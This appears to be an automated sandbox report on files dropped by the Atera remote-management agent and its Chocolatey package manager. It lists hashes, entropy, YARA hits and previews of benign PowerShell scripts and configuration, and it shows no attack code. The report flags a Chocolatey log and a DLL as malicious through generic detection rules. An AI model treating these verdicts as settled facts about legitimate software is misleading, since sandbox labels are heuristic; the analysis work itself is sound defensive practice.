                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):275
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.877907726544251
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:tVb5kBm7ObCDL7fsDPV7gRoUvlwTS7v33LQ7mLLlGKACCWOKEe:pem717f8PV7UO+fo6BNVB
                                                                                                                                                                                                                                                                                              MD5:DA74935F66150D0D5B81820876FB7CF6
                                                                                                                                                                                                                                                                                              SHA1:72C2E449991D8AC8475D975278DA19E5ECD22602
                                                                                                                                                                                                                                                                                              SHA-256:784F35617FF7C184384B9710C94709F9A55F3FABF51DC8A68C5429BC5A595E2D
                                                                                                                                                                                                                                                                                              SHA-512:A37949ADC8B72F522CCE6875090585A47809E9CB3A269036BF2F318BE87AC189178DB2258410EC4EFADAA5E878074D027A6EE7FEB0C29827546270BD46CA904C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\choco-logs\01-06-2025 06_59_25-log.txt, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...Outdated Packages.. Output is package name | current version | available version | pinned?......Chocolatey has determined 0 package(s) are outdated. ..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6655016
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.267118093322128
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:98304:jCMEM0MUMRMxMwMkfqbjxbSzGVr4W11ByHY4W6upIjD:jlV1qKpkfqbjeGVr4NHYJ60iD
                                                                                                                                                                                                                                                                                              MD5:C4AD1B5AFC9FC19605C1D18D32CF30A8
                                                                                                                                                                                                                                                                                              SHA1:7950FC1B7E17E740F3B0F88CD746238A48ABF645
                                                                                                                                                                                                                                                                                              SHA-256:27847B79721CDA829F662198CB36C053B458635BE3E85E9A9265BDF9D37B33C0
                                                                                                                                                                                                                                                                                              SHA-512:38DC58B27393488DF69A3378AB2BC250367186912FC4F7D9D3A3AD1C882763F36E22E2FB2056CEF345B4C13A2930D9A16E556054593577DCEBE5D71258120B4B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9382
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.897728965151623
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:rwhyxWvf7L6ZaBbrzRmXBzCWKZD68NJ+IK2E8V1ExAuVXI4n7rJ+ZXVx:sjL6ZiHt6B+WshDK2EiEJ7lEFx
                                                                                                                                                                                                                                                                                              MD5:14FFCF07375B3952BD3F2FE52BB63C14
                                                                                                                                                                                                                                                                                              SHA1:AB2EADDE4C614EB8F1F2CAE09D989C5746796166
                                                                                                                                                                                                                                                                                              SHA-256:6CCFDB5979E715D12E597B47E1D56DB94CF6D3A105B94C6E5F4DD8BAB28EF5ED
                                                                                                                                                                                                                                                                                              SHA-512:14A32151F7F7C45971B4C1ADFB61F6AF5136B1DB93B50D00C6E1E3171E25B19749817B4E916D023EE1822CAEE64961911103087CA516CF6A0EAFCE1D17641FC4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<chocolatey xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">.. <config>.. <add key="cacheLocation" value="" description="Cache location if not TEMP folder. Replaces `$env:TEMP` value for choco.exe process. It is highly recommended this be set to make Chocolatey more deterministic in cleanup." />.. <add key="containsLegacyPackageInstalls" value="true" description="Install has packages installed prior to 0.9.9 series." />.. <add key="commandExecutionTimeoutSeconds" value="2700" description="Default timeout for command execution. '0' for infinite (starting in 0.10.4)." />.. <add key="proxy" value="" description="Explicit proxy location. Available in 0.9.9.9+." />.. <add key="proxyUser" value="" description="Optional proxy user. Available in 0.9.9.9+." />.. <add key="proxyPassword" value="" description="Optional proxy password. Encrypted. Available in 0.9.9.9+." />.. <add key
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (965), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12946
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.132019659587194
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ctpHjcTfbZO0g2ZyAvGZkAsoXCxAziDR/67E4Pb:ctpDBCvGZkAsCCxAziDR/sF
                                                                                                                                                                                                                                                                                              MD5:0BB54C9DA241E0EAAFB6C976AC07EAA7
                                                                                                                                                                                                                                                                                              SHA1:045808C9106A4C356AB15A2D8680FDB737DC98A6
                                                                                                                                                                                                                                                                                              SHA-256:071CE6FCE85051E373C1B05BB82A92FFB8BEBF34C768B7A2F6E809000A78479F
                                                                                                                                                                                                                                                                                              SHA-512:C118C9FEC5903D1F2F6A6FA070130FCEBAAD70AF3459DA82069C5C8ED3D66CEE374C098C6247CCD528187B6856FAA458EBBD8B6F2C0C68C2A5B8EF32C2D7CD75
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# Ideas from the Awesome Posh-Git - https://github.com/dahlbyk/posh-git..# Posh-Git License - https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txt..# http://www.jeremyskinner.co.uk/2010/03/07/using-git-with-windows-powershell/....$Global:ChocolateyTabSettings = New-Object PSObject -P
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3903
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.986280475081154
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKoqWJBYc4R2wf3TQJb3jl7t3iv:cSyL+QGXHMWJB7VFUv
                                                                                                                                                                                                                                                                                              MD5:1CF35331F337493A5B5B8C482E32B507
                                                                                                                                                                                                                                                                                              SHA1:149D5B5ABB4FF20CFAA333946BAAEC6B8EFA5630
                                                                                                                                                                                                                                                                                              SHA-256:CCF763934E3801002C260246316DF70C64C66E7721C24B300C634567F5885A39
                                                                                                                                                                                                                                                                                              SHA-512:03652CA25D2A78860F735B57600B940D2723DD23E24A2632D5CA76DBFACBF95CD1090428FB6AC23BF945AB20C1C201155CF26161361853DB94A5D85AE753C0A1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....$helpersPath = Split-Path -Parent $MyInvocation.MyCommand.Definition....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') {.. $global:DebugPrefe
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1178
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.161789340951933
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:cSyJ3554IpgyZA0SU0E+SlHQk1GpsLAjQSDg6pucReEe7:cSyX54pyFd0AlH31KoLKRed
                                                                                                                                                                                                                                                                                              MD5:610AD6370C8DACB3861200B8827DF768
                                                                                                                                                                                                                                                                                              SHA1:E6831DF0C1ADB4664BDE6D2D48DCE28CC1918A83
                                                                                                                                                                                                                                                                                              SHA-256:B06996C9A26663FCF41B2406D12C4597075AB7F94CDD320EEE64EAC9AEA95DFD
                                                                                                                                                                                                                                                                                              SHA-512:C3A30128443E47D5D38CFD8C989E8317668EEDA6B4E85BEE94B76034479DEC0BED4C980ACD797153259CF0DF2807E79C3B3F4AAADF21E255A35BBDBE2F2E16E9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# ..# You may obtain a copy of the License at..# ..# http://www.apache.org/licenses/LICENSE-2.0..# ..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....if (Get-Module chocolateyProfile) { return }....$thisDirectory = (Split-Path -parent $MyInvocation.MyCommand.Definition)..... $thisDirectory\functions\Write-FunctionCallLogMessage.ps1... $thisDirectory\functions\Get-EnvironmentVariable.ps1... $thisDirectory\functions\Get-EnvironmentVariableNames.ps1... $thisDirectory\fun
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2892
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.176658574720988
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.param(.. [alias("ia","installArgs")][string] $installArguments = '',.. [alias("o","override","overrideArguments","notSilent")].. [switch] $overrideArgs = $false,.. [alias("x86")][switch] $forceX86 = $false,.. [alias("params","parameters","pkgParams")][string]$packageParameters = '',.. [string]$packageScript..)....$global:DebugPreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentDebug -eq 'true') { $global:DebugPreference = "Continue"; }..$global:VerbosePreference = "SilentlyContinue"..if ($env:ChocolateyEnvironmentVerbose -eq 'true') { $global:VerbosePreference = "Continue"; $verbosity = $true }....Write-Debug '---------------------------Script Execution---------------------------'..Write-Debug "Running 'ChocolateyScriptRunner' for $($env:packageName) v$($env:packageVersion) with packageScript `'$packageScript`', packageFolder:`'$($env:packageFolder)`', installArguments: `'$installArguments`', packageParameters: `'$packageParameters`',"....## Set the culture to invar
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1751
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.27319452124258
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Format-FileSize {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Formats file size into a human readable format......NOTES..Available in 0.9.10+.....This function is not part of the API......INPUTS..None.....OUTPUTS..Returns a string representation of the file size in a more friendly..form
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (505), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11504
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.008896354130034
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChecksumValid {..<#...SYNOPSIS..Checks a file's checksum versus a passed checksum and checksum type......DESCRIPTION..Makes a determination if a file meets an expected checksum s
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10482
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.191184135569746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyUnzip {..<#...SYNOPSIS..Unzips an archive file and returns the location for further processing......DESCRIPTION..This unzips files using the 7-zip command line tool 7z.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16502
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.146477219224201
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ChocolateyWebFile {..<#...SYNOPSIS..Downloads a file from the internets......DESCRIPTION..This will download a file from a url, tracking with a progress bar...It returns the file
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4123
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.288017280806032
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariable {..<#...SYNOPSIS..Gets an Environment Variable......DESCRIPTION..This will will get an environment variable based on the variable name..and scope while accoun
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2060
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.165746374691896
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-EnvironmentVariableNames([System.EnvironmentVariableTarget] $Scope) {..<#...SYNOPSIS..Gets all environment variable names......DESCRIPTION..Provides a list of environment variabl
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7947
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.051645140778019
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.## Get-FtpFile..##############################################################################################################..## Downloads a file from ftp..## Some code from http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershell..## Additional functionality emulated from http://poshcode.org/417 (Get-WebFile)..## Written by Stephen C. Austin, Pwnt & Co. http://pwnt.co..##############################################################################################################..## Additional functionality added by Chocolatey Team / Chocolatey Contributors..## - Proxy..## - Better error handling..## - Inline documentation..## - Cmdlet conversion..## - Closing request/response and cleanup..## - Request / ReadWriteResponse Timeouts..##############################################################################################################..function Get-FtpFile {..<#...SYNOPSIS..Downloads a file from a File Transfter Protocol (FTP) l
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2930
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.220783998189862
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-OSArchitectureWidth {..<#...SYNOPSIS..Get the operating system architecture address width......DESCRIPTION..This will return the system architecture address width (probably 32 or
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7233
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.212503071724739
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2016 - 2017 Original authors from https://github.com/chocolatey/chocolatey-coreteampackages..# Copyright . 2016 Miodrag Mili. - https://github.com/majkinetor/au-packages/commit/bf95d56fe5851ee2e4f6f15f79c1a2877a7950a1..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....# special thanks to the Core Community Maintainers team and their work..# on the Get-PackageParameters function that is in the..# `chocolatey-core.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (333), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3761
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.908858016895155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-ToolsLocation {..<#...SYNOPSIS..Gets the top level location for tools/software installed outside of..package folders......DESCRIPTION..Creates or uses an environment variable that a user can control to..communicate with packages about where they would like software that is..not installed through native installer
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1891
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.216117200464903
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UACEnabled {..<#...SYNOPSIS..Determines if UAC (User Account Control) is turned on or off......DESCRIPTION..This is a low level function used by Chocolatey to decide whether..pro
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6009
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.183782879831246
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyp4aXHFKo+l0Y9WqbUqcN1bLZAiwSVg2SHBjqmnn3seTIIe8bMH/g4F267rTli:cSypHXHyJvIXN1miVVoTIyJ6rT25
                                                                                                                                                                                                                                                                                              MD5:8BDD492FD645ABC85E1A76BFB3BB9306
